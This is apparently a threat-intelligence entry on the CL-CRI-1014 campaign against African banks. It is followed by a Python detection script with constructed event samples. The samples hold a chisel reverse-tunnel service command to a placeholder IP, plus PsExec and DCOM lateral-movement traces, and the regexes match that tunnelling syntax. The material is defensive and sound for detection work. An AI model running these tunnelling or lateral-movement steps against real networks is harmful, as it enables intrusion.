216.73.217.80

Cybercriminals Abuse Open-Source Tools To Target Africa's Financial Sector

· Published 26/06/2025 17:27 · Modified 27/06/2025 07:25


Essential information

Published
26/06/2025 17:27
Modified
27/06/2025 07:25
Tags
2025-06-26, chisel, financial sector, lateral movement, poshc2
Related entities
32 observables, 1 intrusion set (APT), 12 techniques (MITRE ATT&CK), 3 malware, 3 others

Description

A series of attacks targeting financial organizations across Africa has been observed since July 2023. The threat actor, tracked as CL-CRI-1014, uses open-source and publicly available tools such as PoshC2, Chisel, and Classroom Spy to build its attack framework, tunnel network communication, and perform remote administration. It forges file signatures to disguise the toolset and mask malicious activity. The attackers are suspected of acting as initial access brokers, establishing footholds in financial institutions in order to sell that access on darknet markets. Their lateral-movement playbook includes creating remote services, executing through DCOM, and using PsExec. The actor also employs evasion methods such as packing its tools and signing them with stolen signatures.
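The playbook above (remote service creation, DCOM execution, PsExec, Chisel tunnelling) leaves a handful of high-signal host events. The following is an added example, not code from the report or its authors: it runs simple detection rules over constructed Windows event records using an assumed Sysmon-like JSON field layout (EventID, ServiceName, ImagePath, ParentCommandLine, CommandLine). Host names, service names and the 203.0.113.5 address are placeholders, not indicators from the report.

```python
"""Detection triage for the CL-CRI-1014 playbook summarised above.

Added example, not code from the original report or its authors.
Field names are an assumed Sysmon-like JSON shape; adapt to your SIEM schema.
"""
import re
from typing import Optional

# Constructed sample events (not real telemetry). Hosts, service names and
# 203.0.113.5 are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    # PsExec registers its PSEXESVC service on the target (System event 7045).
    {"EventID": 7045, "Host": "fin-srv-01", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe"},
    # Renamed tunnelling binary installed as a service; the arguments follow
    # chisel's client syntax with a reverse SOCKS listener (R:socks).
    {"EventID": 7045, "Host": "fin-srv-02", "ServiceName": "WinUpdateSvc",
     "ImagePath": "C:\\ProgramData\\svchost.exe client 203.0.113.5:8443 R:socks"},
    # Service binary staged on the target's ADMIN$ share (PsExec-style).
    {"EventID": 7045, "Host": "fin-srv-04", "ServiceName": "bfedcb1",
     "ImagePath": "\\\\fin-srv-04\\ADMIN$\\bfedcb1.exe"},
    # DCOM lateral movement via MMC20.Application: mmc.exe launched with
    # -Embedding by the DcomLaunch svchost (Sysmon event 1).
    {"EventID": 1, "Host": "fin-srv-03",
     "ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p",
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "\"C:\\Windows\\System32\\mmc.exe\" -Embedding"},
    # Benign controls: a vendor service install and an interactive mmc launch.
    {"EventID": 7045, "Host": "fin-ws-09", "ServiceName": "Sense",
     "ImagePath": "\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe\""},
    {"EventID": 1, "Host": "fin-ws-09",
     "ParentCommandLine": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mmc.exe",
     "CommandLine": "\"C:\\Windows\\System32\\mmc.exe\" compmgmt.msc"},
]

# chisel client <server[:port]> ... R:<remote spec>  (reverse tunnel)
CHISEL_ARGS = re.compile(r"\bclient\b\s+\S+.*\bR:", re.IGNORECASE)
# Service image path pointing at \\<host>\ADMIN$\...
ADMIN_SHARE = re.compile(r"^\\\\[^\\]+\\ADMIN\$\\", re.IGNORECASE)
# Parent is the DCOM activation host
DCOM_PARENT = re.compile(r"svchost\.exe\s+-k\s+DcomLaunch", re.IGNORECASE)


def classify(ev: dict) -> Optional[str]:
    """Return the name of the rule an event trips, or None if it looks benign."""
    eid = ev.get("EventID")
    if eid == 7045:  # new service installed
        name = ev.get("ServiceName", "")
        path = ev.get("ImagePath", "")
        if name.upper() == "PSEXESVC" or "PSEXESVC" in path.upper():
            return "psexec_service_install"
        if ADMIN_SHARE.match(path):
            return "service_binary_on_admin_share"
        if CHISEL_ARGS.search(path):
            return "chisel_reverse_tunnel_service"
        return None
    if eid == 1:  # process creation
        parent = ev.get("ParentCommandLine", "")
        cmd = ev.get("CommandLine", "")
        if DCOM_PARENT.search(parent) and "-Embedding" in cmd:
            return "dcom_embedding_launch"
    return None


def triage(events) -> dict:
    """Map each rule that fired to the sorted list of hosts it fired on."""
    hits: dict = {}
    for ev in events:
        rule = classify(ev)
        if rule:
            hits.setdefault(rule, set()).add(ev.get("Host", "?"))
    return {rule: sorted(hosts) for rule, hosts in hits.items()}


if __name__ == "__main__":
    for rule, hosts in triage(SAMPLE_EVENTS).items():
        print(f"{rule}: {', '.join(hosts)}")
```

The DCOM rule is the noisiest of the four: legitimate COM activations also produce DcomLaunch-parented processes with `-Embedding`, so in production it should be correlated with a preceding network logon (event 4624, logon type 3) from a host that does not normally administer the target. The service rules are the opposite: a PSEXESVC install or a service binary on ADMIN$ is rarely benign outside scheduled administration windows, and a renamed binary whose arguments match chisel's client syntax should be pulled for analysis regardless of whether its signature verifies, since the report notes the actor forges and steals signatures precisely to pass that check.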

External references